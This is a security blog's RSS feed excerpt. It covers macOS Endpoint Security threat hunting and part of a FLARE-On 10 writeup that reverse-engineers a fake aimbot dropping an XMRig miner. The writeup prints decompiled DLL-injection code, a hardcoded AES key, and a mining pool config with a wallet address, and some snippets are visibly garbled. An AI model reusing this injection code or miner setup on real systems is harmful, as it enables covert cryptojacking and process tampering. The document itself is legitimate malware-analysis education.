<pre><code class="lang-cpp"><span class="hljs-function">Copy <span class="hljs-title">codedispatch_async</span><span class="hljs-params">(dispatch_get_global_queue(QOS_CLASS_USER_INITIATED, <span class="hljs-number">0</span>), ^{
    <span class="hljs-comment">// Run your authorization logic on a separate queue</span>
    <span class="hljs-keyword">es_auth_result_t</span> result = auth_event_handler(msg);

    dispatch_async(dispatch_get_main_queue(), ^{
        <span class="hljs-comment">// Respond on the main queue</span>
        es_respond_auth_result(client, msg, result);
    });
})</span></span>;

<span class="hljs-comment">// Respond with a temporary "allow" decision to meet the deadline</span>
es_respond_auth_result(client, msg, ES_AUTH_RESULT_ALLOW);
</code></pre>
<p>In this example, the authorization logic runs on a separate queue, while the main queue responds with a temporary "allow" decision to meet the deadline. Once the asynchronous task completes, it dispatches back to the main queue to send the actual authorization decision.</p>
<p>Comapred to KPIs, being an <code>EndpointSecurity</code> app in macOS has plenty of benefits both from an agent protection/compatibility perspective and from a developer experience perspective. It's definitely the way that the industry in general is moving with major vendors like <a target="_blank" href="https://www.crowdstrike.com/blog/crowdstrike-supports-new-macos-big-sur/">Crowdstrike</a>, <a target="_blank" href="https://www.sentinelone.com/blog/going-kextless-why-we-all-need-to-transition-away-from-kernel-extensions/">SentinelOne</a>, and <a target="_blank" href="https://www.elastic.co/guide/en/security/current/endgame-sensor-full-disk-access.html#system-extension">Elastic</a> already supports the new implementation.</p>
<p>But in the course of my research and work, i found that there are still alot of endpoint security products not using the new System Extensions method. You can figure out which products are currently using System Extensions by using the <code>systemextensionsctl list</code> command.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1717523628859/098ecbdf-a433-4063-b33a-e6367c56236a.png" alt /></p>
<p>In macOS Ventura and above, if you still want to use security products with the deprecated kernel extension methods you can still do so by going into RecoveryOS and enable <code>Reduced Security</code> mode. This will both allow EDR/DLP products and also MDM products with kernel extensions to remain running in your system.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1717523755612/919d2bc8-6b0f-4933-913d-db2510afd345.png" alt class="image--center mx-auto" /></p>
<p>But this is truly a stopgap solution, if you are in a position where you have to compromise security because your vendor (which was already given around a four year transition gap to adapt to the new standards) haven't migrated to System Extensions, you should contact your principal or account manager immediately to pressure them to migrate. But your milelage may (most likely will) vary.</p>
]]></content:encoded></item><item><title><![CDATA[Introduction to the Apple Endpoint Security Framework]]></title><description><![CDATA[Cover Illustration by ireneparamithaa

For years there are two camps of perception in MacOS security, those who think that Macs are impenetrable boxes by design and sysadmins who are constantly horrified by the lack of protections that MacOS has desp...]]></description><link>https://research.meekolab.com/introduction-to-the-apple-endpoint-security-framework</link><guid isPermaLink="true">https://research.meekolab.com/introduction-to-the-apple-endpoint-security-framework</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Fri, 26 Jan 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1707293858941/78ff9e37-d7be-4fd5-94d5-2e551c729eee.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by ireneparamithaa</em></strong></p>
</blockquote>
<p>For years there are two camps of perception in MacOS security, those who think that Macs are <a target="_blank" href="https://www.makeuseof.com/tag/macs-likely-malware-windows/">impenetrable boxes</a> by design and sysadmins who are constantly horrified by the <a target="_blank" href="https://www.sentinelone.com/blog/mac-admins-why-apples-silent-approach-to-endpoint-security-should-be-a-wake-up-call/">lack of protections</a> that MacOS has despite being a more locked-down platform than Windows. For a time these two camps coexist simply because for years MacOS was never an attractive platform to attack by threat actors due to its low adoption rate.</p>
<p>But as Apple's marketshare grows, especially for the enterprise market and particularly in tech firms, more and more complex malware are beginning to attack MacOS systems. The SmoothOperator 3CX supply chain compromise and Lockbit's foray into Mac ransomware are evidence that many threat actors are now moving toward Mac as a platform to attack.</p>
<p>For a time, Apple allowed third party code, especially security products, to run in kernel-land via kexts (Kernel Extensions), which if you come from the <a target="_blank" href="https://medium.com/macoclock/what-are-kexts-in-macos-or-hackintoshes-kextcache-58082d6a97a9#:~:text=Kext%20files%20are%20essential%20drivers,sound%2C%20ethernet%2C%20and%20more.">Hackintosh scene</a> might bring parallels to how drivers work in Windows. I have written extensively how this approach in Windows <a target="_blank" href="https://blog.maikxchd.com/analyzing-genshin-impacts-anticheat-module">didn't really worked out well</a>, giving programmers the ability to run code inside the kernel (even trusted developers that are vetted through programs such as WHQL) sometimes can bring unintended consequences.</p>
<p>Apple's Endpoint Security Framework (ES) is a C API made by Apple as a solution for EDR/AV vendors to monitor OS telemetry events in the userspace similar to Windows ETW-TI. Since the implementation of the ES API, monitoring technologies via kext and the default Full Security level in iBoot have become largely outdated. This shift is evident in the XNU source code, where developers have introduced the <code>__kpi_deprecated(_msg)</code> macro, which generates a compile-time warnings, advising the use of EndpointSecurity instead.</p>
<h1 id="heading-a-more-open-endpoint-security-standard">A More Open Endpoint Security Standard</h1>
<p>Similar to Microsoft's approach in Windows via <a target="_blank" href="https://blog.maikxchd.com/introduction-into-microsoft-threat-intelligence-drivers-etw-ti">ETW-TI</a>, ES provides a way for EDR/AV systems to run in user-mode privileges while still retaining the security and protection they enjoy running in kernel space.</p>
<p>For your userspace apps to successfully register with the ES API you must be properly entitled with the <code>com.apple.developer.endpoint-security.client</code> entitlement, which requires an entitlement from <a target="_blank" href="https://developer.apple.com/documentation/bundleresources/entitlements/com_apple_developer_endpoint-security_client">Apple</a> via the <a target="_blank" href="https://developer.apple.com/contact/request/system-extension/">Apple Developer System Extensions Request Form</a>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1707294060483/421662d3-a26b-415a-95ff-ec2cfd1195de.jpeg" alt class="image--center mx-auto" /></p>
<p>This is kinda more similar to the requirement for Early Launch Anti-Malware (ELAM) drivers that must adhere to specific program requirements set by Microsoft, including being signed by the Windows Hardware Quality Lab (WHQL) and the necessity for antimalware vendors to be part of the <a target="_blank" href="https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/virus-initiative-criteria?view=o365-worldwide">Microsoft Virus Initiative (MVI)</a> to participate in the ELAM program​​​​​​.</p>
<p>Of course, while Apple is selective on who can get access to the ES, it is still more open compared to the standards instilled by Microsoft with you needing to be an MVI vendor to be build an <a target="_blank" href="https://learn.microsoft.com/en-us/windows-hardware/drivers/install/elam-prerequisites">ELAM driver</a>.</p>
<h1 id="heading-general-architecture-overview">General Architecture Overview</h1>
<p>There are three main components of ES :</p>
<ul>
<li><p><code>libEndpointSecuritySystem.dylib</code></p>
<p>  This is a userland dynamic library for apple to link MacOS components to the ES API so they can emit events into <code>EndpointSecurity.kext</code>, which allow binaries to emit ES events around background task management, XProtect detection events, sudo invocation, TouchID usage, screensharing/recording activity, and OpenSSH logins</p>
</li>
<li><p><code>libEndpointSecurity.dylib</code></p>
<p>  This is userland dynamic library for developers working with ES that handles the access of several abilities reserved for <code>EndpointSecurity.kext</code> safely via API to third party applications, so when developers build with ES API signed by the required entitlement, they will link it against <code>libEndpointSecurity.dylib</code>. Doing this allows apps to subscribe to ES events, applying path muting, and authorizing system activity</p>
</li>
<li><p><code>endpointsecurityd</code></p>
<p>  This is a userland daemon that does validation to the system extensions that use ES by validating its privileges, enables the installation/uninstallation of the extension, registering the system extension as an early boot process (with <code>NSEndpointSecurityEarlyBoot</code> in <code>info.plist</code>, similar to ELAM on Windows), and the recording of analytics through the CoreAnalytics framework</p>
</li>
<li><p><code>EndpointSecurity.kext</code></p>
<p>  This is a kernel extension made by Apple that enables proxying requests from EF API system extensions that exist userspace through Apple's own kernel drivers, which enables more security and control instead of just letting applications themselves inline to the XNU kernel</p>
</li>
</ul>
<p>ES events come from both the hooking the system calls of kernel-level events and through the <code>libEndpointSecuritySystem.dylib</code> dynamic library for system components which much higher levels of abstraction. Processes that do not have the <code>com.apple.private.endpoint-security.submit</code> entitlement are explicitly forbidden from giving ES events to <code>EndpointSecurity.kext</code> to protect the integrity of ES event logs.</p>
<h1 id="heading-es-events-for-threat-hunting">ES Events for Threat Hunting</h1>
<p>Building your own system extension and building a pipeline to display it might be trivial for some individuals, but the entitlement needed from Apple provides a barrier for many from using this API. A way to circumvent this is to create a system extension to query the ES API without the entitlement and running it with System Integrity Protection (SIP) <a target="_blank" href="https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection">disabled</a>, but within a forensics or incident response scenario this might contaminate the endpoint in a breach scenario. Thus this is where <a target="_blank" href="https://github.com/redcanaryco/mac-monitor">Mac Monitor</a> by Red Canary comes in.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703876216653/ed3f8e47-9495-4cb2-a75d-2990e73ef77a.png" alt class="image--center mx-auto" /></p>
<p>Mac Monitor allows us to read ES events in an enriched way, and also gives us a more graphic user interface and a set of event filters that makes us able to read certain events. In a way, this is similar to a more beefed up version of Windows <a target="_blank" href="https://learn.microsoft.com/en-us/sysinternals/downloads/procmon">Process Monitor</a>.</p>
<h3 id="heading-searching-for-programs-with-malicious-activity">Searching for Programs with Malicious Activity</h3>
<p>To demonstrate the value of ES for threat hunting, we can try it by detonating a sample in a VM. I'm gonna use the Calisto malware, accessible via the Objective See Foundation <a target="_blank" href="https://objective-see.org/malware.html">Mac Malware Collection</a><strong>.</strong> Calisto is an infostealer that masquerades as an installer for Intego's Mac Internet Security X9, an personal security product for MacOS.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703877052485/737066bb-53c8-4836-acb3-e43fc9a0a3a2.png" alt class="image--center mx-auto" /></p>
<p>Upon execution, we can open Mac Monitor to see of any suspicious events. We can see immediately that the installer is flagged almost instantly by ES.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703877156113/3c822b01-3fa7-41b0-8a4c-b1481d93e8f2.png" alt class="image--center mx-auto" /></p>
<p>Looking deeper, we can see that this is flagged as a <code>ES_EVENT_TYPE_NOTIFY_EXEC</code> which notifies ES that a process is executing an image, by itself its not supposed to be something suspicious but what makes it pops out is that the application is not signed at all. Considering this is supposedly a legitimate security product with hooks into MacOS, its unusual for it to have no codesigning whatsoever.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703877140963/366fb56e-7ac5-44e3-b893-f515effcb0e3.png" alt class="image--center mx-auto" /></p>
<p>Digging into the event correlation tab, we can see several events correlated with the application in question. Since Calisto is an old malware from 2018, we can see the things that it does in <a target="_blank" href="https://securelist.com/calisto-trojan-for-macos/86543/">writeups</a> that people have made. Since System Integrity Protection is enabled on the VM, we can only see the events that correspond to the malware's infostealing functions.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703877394986/dccf7850-51f8-413d-8463-92ff0f83275e.png" alt class="image--center mx-auto" /></p>
<p>From the <a target="_blank" href="https://developer.apple.com/documentation/endpointsecurity/es_event_type_t">ES_EVENT</a> types we can find the following</p>
<ul>
<li><p><a target="_blank" href="https://developer.apple.com/documentation/endpointsecurity/es_event_type_t/es_event_type_auth_create"><code>ES_EVENT_TYPE_AUTH_CREATE</code></a> This event records all file creation operations, which sees that the creation of a hidden folder named <code>.calisto</code> in the main user directory</p>
</li>
<li><p><a target="_blank" href="https://developer.apple.com/documentation/endpointsecurity/es_event_type_t/es_event_type_auth_copyfile"><code>ES_EVENT_TYPE_AUTH_COPYFILE</code></a> and <a target="_blank" href="https://developer.apple.com/documentation/endpointsecurity/es_event_type_t/es_event_type_auth_mmap"><code>ES_EVENT_TYPE_AUTH_MMAP</code></a> which sees that the program is copying data from the MacOS Keychain and Google/Safari browsing data</p>
</li>
</ul>
<p>Peeking in the directory will reveal that inside <code>.calisto</code> there is a zip file called <code>KC.zip</code> which contains a full duplicate of the MacOS Keychain folder</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703909545675/34937b32-7b9c-4b27-bbca-2ab2210f31dd.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-searching-for-malicious-code-execution">Searching for Malicious Code Execution</h3>
<p>Another thing we can simulate and hunt through ES is suspicious code execution, and for this we can use <a target="_blank" href="https://github.com/redcanaryco/AtomicTestHarnesses/tree/master/posix">Posix Atomic Test Harness</a> to simulate the abuse of AppleScript, a scripting language for macOS that allows control over applications and parts of the operating system through inter-application messages called AppleEvents. It can be used to locate open windows, send keystrokes, and interact with almost any open application either locally or remotely.</p>
<p>Scripts can be executed in various ways: from the command line using <code>osascript</code>, within mach-O binaries using macOS Native APIs like <code>NSAppleScript</code> or <code>OSAScript</code>, or even as plain text shell scripts.</p>
<p>Atomic <code>posixath</code> includes tests for different execution methods of AppleScript, such as through the <code>NSAppleScript</code> API, the command-line utility <code>osascript</code>, shell scripts with a shebang (<code>#!/usr/bin/osascript</code>), and as part of applets or stay-open-scripts. These tests are crucial for understanding how AppleScript can be used (or abused) in various scenarios, including benign automation tasks or potentially malicious activities.</p>
<p>Upon execution, we found that the script works as expected and unimpeded.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703922012987/5aa479ed-8838-4959-8008-95203f73811c.png" alt class="image--center mx-auto" /></p>
<p>But upon looking in Mac Monitor, we can see that the event is logged, and MacOs has flagged the "applet" process.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703921653306/c7ecd5c8-1d73-4e3a-8699-7c52a24323c9.png" alt class="image--center mx-auto" /></p>
<p>Reading into it, we can also read the complete process execution chain, which can help in threat detection to detect where the malicious execution originates and where its ending up in.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1703921665396/1306133b-b32e-4d62-a864-2729af95ec34.png" alt class="image--center mx-auto" /></p>
<p>Blocking more esoteric attack methods are key to improving EDR products in MacOS, especially knowing how lackluster solutions like Gatekeeper and XProtect can be sometimes <a target="_blank" href="https://www.sentinelone.com/blog/mac-admins-why-apples-silent-approach-to-endpoint-security-should-be-a-wake-up-call/">iffy against blocking</a> threats. While enabling SIP and Gatekeeper can stop around 80% of attacks, there will always be those weirder attack chains that EDRs need more advanced telemetry sources to detect.</p>
<h3 id="heading-other-smoking-guns-in-es-logs">Other Smoking Guns in ES Logs</h3>
<p>While the events above show entrypoints for you to start your threat hunting journey, there are other events that are of interest in a threat hunting perspective that provides clear "smoking guns" in your investigation. Within your investigation you can filter and target these specific event types for threat detection. This is gathered using testing from different C2 platforms such as SliverC2, CobaltStrike (via Geacon), and MacShellSwift.</p>
<ul>
<li><p><code>ES_EVENT_TYPE_NOTIFY_FCNTL</code> Records the manipulation of a file descriptor, most of the time to get the file flag indicating a process is trying to gain dynamic access.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_READLINK</code> Records symlink reading operations, and most of these operations involve reading the link to <code>/etc/</code>, so any READLINK operation that doesn't point from SYSTEM to <code>/etc/</code> should be considered malicious.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_MMAP</code> Records memory mapping operations on the system where it's possible to identify weird mappings that may be indicative of malicious activity.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_MPROTECT</code> Records all memory protection events, which can be seen as anomalous when run by interesting processes such as memory protection assigned to <code>/bin/sh</code>.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_IOKIT_OPEN</code> Records all process that calls to open an IOKit device, which can be useful in detecting malicious code thats performing screen capture or webcam monitoring operations which require IOKits related to hardware graphics acceleration. These events are usually triggered in a stream until the operation is finished so if you see an application that is using this IOKit without you using your webcam or screensharing, there is a big chance that you're actually being monitored.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_PTY_GRANT</code> Records all processes that grants a pseudoterminal device to a user, which is used to create a communication channel between a controlling terminal and a slave terminal. This is usually used to generate interactive shell instances and is rarely a normal system operation, so it appearing should be a red flag.</p>
</li>
<li><p><code>ES_EVENT_TYPE_NOTIFY_SETMODE</code> Records changes in file access permissions via utilities like <code>chmod</code>, which we can utilize to monitor for access changes for non-standard binaries (outside of system directories like <code>/bin/bash</code> or developer tools like Xcode) to indicate malicious activity.</p>
</li>
</ul>
<h1 id="heading-conclusion">Conclusion</h1>
<p>ES provides a multifaceted approach to threat detection and response. It serves as a powerful tool for monitoring system events for signs of malicious activity, enabling registered clients to receive notifications of such events. This functionality is crucial for developing advanced EDR solutions that can effectively monitor and, when necessary, block system events to conform to security policies and protect against potential threats.</p>
<p>From a threat detection perspective, the ES framework is instrumental in macOS security. Its capabilities extend beyond mere notification of events; it allows for a proactive stance in security management. For example, with authorization events, ES enables applications to take pre-emptive actions against potentially harmful processes. This feature is critical in stopping threats before they materialize into actual breaches or system compromises.</p>
<p>The existence of tools like Red Canary Mac Monitor also shrinks the skill gap required to do threat analysis in MacOS, which I honestly think is about time. I'm too bored doing detection engineering in Windows and with ES and tools like Mac Monitor I think MacOS Detection Engineering has a bright future.</p>
]]></content:encoded></item><item><title><![CDATA[A Shitty FLARE-On 10 Writeup for Challenge 4 (Aimbot)]]></title><description><![CDATA[Cover Illustration by mocapoca_, the illustration is purchasable via https://twitter.com/mocapoca_/status/1728761352469324072 (Indonesian only)

This is a write up of FLARE-ON Challenge 4, which is unfortunately where I stopped doing the challenges d...]]></description><link>https://research.meekolab.com/a-shitty-flare-on-10-writeup-for-challenge-4-aimbot</link><guid isPermaLink="true">https://research.meekolab.com/a-shitty-flare-on-10-writeup-for-challenge-4-aimbot</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Wed, 24 Jan 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1701973249460/5353a445-66dd-404b-8420-e43e9b06c5ad.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by mocapoca_, the illustration is purchasable via</em></strong> <a target="_blank" href="https://twitter.com/mocapoca_/status/1728761352469324072">https://twitter.com/mocapoca_/status/1728761352469324072</a> (Indonesian only)</p>
</blockquote>
<p>This is a write up of FLARE-ON Challenge 4, which is unfortunately where I stopped doing the challenges due to work and also purely because it got harder after this. I guess for me, stopping at a cheating software for my first ever FLARE-On attempt is kinda… funny.</p>
<h2 id="heading-initial-file">Initial File</h2>
<p>After extracting the file, we obtained one executable file called <code>aimbot.exe</code>. This is an aimbot for the open-source FPS <a target="_blank" href="http://sauerbraten.org/">Sauerbraten</a>. Upon execution it creates a window titled BananaAimBot that can launch the game with the purported aimbot. Looking into it in IDA, we can see that BananaAimBot is spawned with the callback function <code>sub_402F0</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1701949180603/9c25f73a-39a0-428d-9728-019c234afd56.png" alt class="image--center mx-auto" /></p>
<pre><code class="lang-c"><span class="hljs-function">LRESULT __fastcall <span class="hljs-title">sub_402AF0</span><span class="hljs-params">(HWND hWndParent, UINT a2, WPARAM a3, HGDIOBJ a4)</span>
</span>{
    HWINSTANCE hInstance; <span class="hljs-comment">// rax</span>
    HWINSTANCE WindowLongPtrA; <span class="hljs-comment">// rax</span>

    <span class="hljs-keyword">if</span> ( a2 == <span class="hljs-number">2</span> )
    {
    DeleteObject(ho);
    PostQuitMessage(<span class="hljs-number">0</span>);
    <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>i64;
    }
    <span class="hljs-keyword">if</span> ( a2 == WM_COMMAND )
    {
        <span class="hljs-keyword">if</span> ( ho == a4 &amp;&amp; (a3 &amp; CCM_COMMANDID_MASK_RESERVED) == <span class="hljs-number">0</span> )
        {
            ShowWindow(hWndParent, <span class="hljs-number">0</span>);
            sub_402150();
            ExitProcess(<span class="hljs-number">0</span>);
        }
        <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>i64;
    }
    <span class="hljs-keyword">if</span> ( a2 != <span class="hljs-number">1</span> )
        <span class="hljs-keyword">return</span> DefWindowProcA(hWndParent, a2, a3, (LPARAM)a4);
    hInstance = (HINSTANCE)GetWindowLongPtrA(hWndParent, <span class="hljs-number">-6</span>);
    ho = CreateWindowExit(
        <span class="hljs-number">0</span>,
        <span class="hljs-string">L"BUTTON"</span>
        <span class="hljs-string">L"Launch Sauerbraten with Aimbot!"</span>,
        <span class="hljs-number">05001001u</span>,
        <span class="hljs-number">10</span>,
        <span class="hljs-number">70</span>,
        <span class="hljs-number">300</span>,
        <span class="hljs-number">30</span>,
        hWndParent,
        <span class="hljs-number">0</span>i64,
        hInstance,
        <span class="hljs-number">0</span>i64);
</code></pre>
<p>Everytime the button is clicked, the function will call <code>sub_402150</code> that checks for the game and the version of the game via a hardcoded MD5 hash which is <code>180B22A08CF0C6D76C7AA5FF170BBF2D</code>. This means that the aimbot only works for a specific version of Sauerbraten, specifically version <code>2020_12_21</code> which is available via <a target="_blank" href="https://sourceforge.net/projects/sauerbraten/files/sauerbraten/2020_11_29/sauerbraten_2020_12_21_windows.exe#/dl.7z">Sourceforge</a>.</p>
<pre><code class="lang-c">sub <span class="hljs-number">404650</span>();
<span class="hljs-built_in">strcpy</span>(v52, <span class="hljs-string">"PROGRAMFILE5(X86)%\\Sauerbraten\\bin64\\Waverbraten.exe"</span>);
ExpandenvironmentStringsA(v52, v56, <span class="hljs-number">0x400</span>u);
ExpandEnvironmentStringsA(<span class="hljs-string">"PROGRAMFILE5(X86)%\\Sauerbraten"</span>, v57, Ox400u);
FileA = CreateFileA(v56, Ox80000000, <span class="hljs-number">1u</span>, <span class="hljs-number">0</span>i64, <span class="hljs-number">3u</span>, <span class="hljs-number">0x80</span>u, <span class="hljs-number">0164</span>);
v1 = FileA;
<span class="hljs-keyword">if</span> ( FileA != (HANDLE)-li64 )
{
    <span class="hljs-keyword">if</span> ( !GetFileSizeEx(FileA, &amp;v49) || (LowPart = v49.Lowpart, v3 = <span class="hljs-built_in">malloc</span>(v49.QuadPart), (v4 = v3) == <span class="hljs-number">0</span>i64)
    {
        CloseHandle(v1);
        <span class="hljs-keyword">return</span>;
    }
    <span class="hljs-keyword">if</span> ( !ReadFile(v1, v3, LowPart, &amp;data, <span class="hljs-number">0</span>i4) )
    {
    CloseHandle(v1);
    <span class="hljs-built_in">free</span>(v4);
    <span class="hljs-keyword">return</span>;
} 
CloseHandle(v1);
sub_402C60(v54);
sub <span class="hljs-number">402000</span>(v54, (__int64)v4, data);
calcMD5(v54);
<span class="hljs-keyword">if</span> ( v54[<span class="hljs-number">11</span>] <span class="hljs-number">0xD7C6F08CA0220B18</span>ui64 <span class="hljs-number">88</span> v54[<span class="hljs-number">12</span>] a= <span class="hljs-number">0x2DBF0B17FFA57A6C</span>i64 )
{
    <span class="hljs-built_in">free</span>(v4);
    <span class="hljs-built_in">memset</span>(v58, <span class="hljs-number">0</span>, <span class="hljs-keyword">sizeof</span>(v55));
</code></pre>
<h2 id="heading-dropped-files">Dropped Files</h2>
<p>"After that, the program decrypts <code>miner.exe</code>, <code>config.json</code>, and <code>aimbot.dll</code>, then extracts the files into a folder at <code>C:\Users\user\AppData\Roaming\BananaBot</code>. The decryption uses standard AES-128/ECB with the key <code>yummyvitamincjoy</code>. The key is hardcoded in plaintext in the code.</p>
<pre><code class="lang-c">decrypt_resource_401F50(<span class="hljs-keyword">void</span> *buf, <span class="hljs-keyword">size_t</span> Size) AES_key_derivation_401BA0(aes_ctx, <span class="hljs-string">"yummyvitamincjoy"</span>);
</code></pre>
<p>The program then executes <code>miner.exe</code>, which is a legit copy of XMRig used to mine monero using CPU resources. XMRig will send a HTTP GET request to <a target="_blank" href="http://127.0.0.1:57328/2/summary">http://127.0.0.1:57328/2/summary</a> which the XMRig sample is configured to listen on via <code>config.json</code>.</p>
<pre><code class="lang-json">{
    <span class="hljs-attr">"http"</span>: {
        <span class="hljs-attr">"enabled"</span>: <span class="hljs-literal">true</span>,
        <span class="hljs-attr">"host"</span>: <span class="hljs-string">"127.0.0.1"</span>,
        <span class="hljs-attr">"port"</span>: <span class="hljs-number">57328</span>,
        <span class="hljs-attr">"access-token"</span>: <span class="hljs-literal">null</span>,
        <span class="hljs-attr">"restricted"</span>: <span class="hljs-literal">true</span>
    },
    <span class="hljs-attr">"autosave"</span>: <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"cpu"</span>: <span class="hljs-literal">true</span>,
    <span class="hljs-attr">"opencl"</span>: <span class="hljs-literal">false</span>,
    <span class="hljs-attr">"cuda"</span>: <span class="hljs-literal">false</span>,
    <span class="hljs-attr">"pools"</span>: [
        {
            <span class="hljs-attr">"url"</span>: <span class="hljs-string">"monerohash.com:9999"</span>,
            <span class="hljs-attr">"user"</span>: <span class="hljs-string">"49jmq1dCvnAAGpeb6aCFyuaXNB8WMJ6fqLTG4twcSjwyNgHagoaQw5EbCw4mf832RPRpf2CH4srVhAxgtSb6A62P2VwJC47"</span>,
            <span class="hljs-attr">"keepalive"</span>: <span class="hljs-literal">true</span>,
            <span class="hljs-attr">"tls"</span>: <span class="hljs-literal">true</span>
        }
</code></pre>
<p>When the GET request succeeds, the program knows XMRig is active and executes the game that's injected with <code>aimbot.dll</code> by copying the DLL's file path into the memory space of the target process and then invoking <code>LoadLibraryA</code> using <code>CreateRemoteThread</code> within the context of the target process.</p>
<pre><code class="lang-c"><span class="hljs-function">_BOOL8 __fastcall <span class="hljs-title">sub_401E80</span><span class="hljs-params">(HANDLE hProcess_Sauerbraten, <span class="hljs-keyword">char</span> *aimbot_dll)</span>
</span>{
    SIZE_T v4; <span class="hljs-comment">// rax</span>
    <span class="hljs-keyword">void</span> *v5; <span class="hljs-comment">// rdi</span>
    SIZE_T v6; <span class="hljs-comment">// rax</span>
    MODULE ModuleHandleA; <span class="hljs-comment">// rax</span>
    MODULE (__stdcall *LoadLibraryA)(LPCSTR); <span class="hljs-comment">// rax</span>

v4 = <span class="hljs-built_in">strlen</span>(aimbot_dll);
v5 = VirtualAllocEx(hProcess_Sauerbraten,; <span class="hljs-number">0</span>i64, v4, <span class="hljs-number">0x3000</span>u, <span class="hljs-number">0x40</span>u);
<span class="hljs-keyword">if</span> ( v5
    &amp;&amp; (v6 &amp; <span class="hljs-built_in">strlen</span>(aimbot_dll), WriteProcessMemory (hProcess_Sauerbraten, v5, aimbot_dll, v6, <span class="hljs-number">0</span>i64))
    &amp;&amp; (ModuleHandleA - GetModuleHandleA(<span class="hljs-string">"kernel32.dll"</span>),
        (LoadLibraryA = (HMODULE (__stdcall *)(LPCSTR))GetProcAddress(ModuleHandleA, <span class="hljs-string">'LoadLibraryA'</span>)) != <span class="hljs-number">0</span>i64)) 
{
    <span class="hljs-keyword">return</span> CreateRemoteThread(hProcess_Sauerbraten, <span class="hljs-number">0</span>i64, <span class="hljs-number">0</span>i64, (LPTHREAD_START_ROUTINE)LoadLibraryA, v5, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>i64) != <span class="hljs-number">0164</span>;
}
<span class="hljs-keyword">else</span>
{
    <span class="hljs-keyword">return</span> <span class="hljs-number">0164</span>; 
}
</code></pre>
<h2 id="heading-aimbotdll-and-its-anti-debug-functions">Aimbot.dll and It's Anti-Debug Functions</h2>
<p><code>aimbot.dll</code> starts 3 threads</p>
<ul>
<li><p>A thread for the aimbot's cheating functions through calling <code>GetAsyncKeyState</code> and uses common math libraries like <code>atan2</code> and <code>sqrt</code>, this thread is irrelevant for the challenge but the aimbot works in-game</p>
</li>
<li><p>A thread for anti-debugging functions, which contains</p>
<ul>
<li><p>Windows API anti-debugging checks through <code>IsDebuggerPresent</code>, <code>CheckRemoteDebuggerPresent</code>, and <code>DbgBreakPoint</code></p>
</li>
<li><p>Checks for debuggers present such as <code>IDA</code> and <code>x64dbg</code> through hardcoded checksum validations</p>
</li>
<li><p>Checks that the DLL is running inside of the game via constant reading main module of the process's memory and the memory of the parent process</p>
</li>
</ul>
</li>
<li><p>A thread for the cheating software's infostealing functions</p>
</li>
</ul>
<p>Due to the anti-debug functions, we will need to decrypt the payload without static analysis. Analyzing the DLL, we can pay attention to address <code>0x62FE4020</code> that are decoded in function <code>62f439b0()</code> using the hardcoded XOR key <code>A9F89964</code> which gets us :</p>
<ul>
<li><p><a target="_blank" href="http://127.0.0.1:57328/2/summary"><code>http://127.0.0.1:57328/2/summary</code></a>&lt;- the XMRig location</p>
</li>
<li><p><code>bananabot 5000</code> &lt;- name of the user agent</p>
</li>
<li><p><code>“version”: “</code> &lt;- XMRig version check</p>
</li>
<li><p><code>the decryption of this blob was successful</code></p>
</li>
</ul>
<p>My initial plan involved a brute force attack on the last four bytes of the AES-256 key, thinking that these bytes were selected from printable ASCII characters because of the <code>strstr</code> call should align with the phrase <code>"version": "</code>, which has a length of 12 characters. Since an AES-256 key is 16 bytes long, we can focus on deciphering the remaining four bytes.</p>
<p>I tried to retrieve the XOR keystream from a known plaintext segment and apply it to our chosen ciphertext. However, this didn't work due to the nature of ECB encryption using the same keystream for each block leading to different XOR keystream bytes for varying inputs.</p>
<p>Then I analyzed the ECB encrypted data more closely and realized that by XOR'ing the first 16 bytes of the ciphertext with the first 16 bytes of a known plaintext segment we could deduce the keystream bytes. Applying this keystream to the second 16-byte block of the ciphertext allowed us to crack it.</p>
<pre><code class="lang-python"><span class="hljs-keyword">from</span> itertools <span class="hljs-keyword">import</span> product
<span class="hljs-keyword">from</span> string <span class="hljs-keyword">import</span> digits
<span class="hljs-keyword">from</span> Crypto.Cipher <span class="hljs-keyword">import</span> AES
<span class="hljs-keyword">from</span> Crypto.Hash <span class="hljs-keyword">import</span> SHA256

key_prefix = <span class="hljs-string">'"version": "'</span>
known_plaintext = <span class="hljs-string">b"the decryption of this blob was successful"</span>
alphabet = digits + <span class="hljs-string">"."</span>

<span class="hljs-comment"># Read the first 16 bytes of ciphertext</span>
<span class="hljs-keyword">with</span> open(<span class="hljs-string">"./program/aimbot_dll_payload_0xa6340_size_0x4470.bin"</span>, <span class="hljs-string">"rb"</span>) <span class="hljs-keyword">as</span> f:
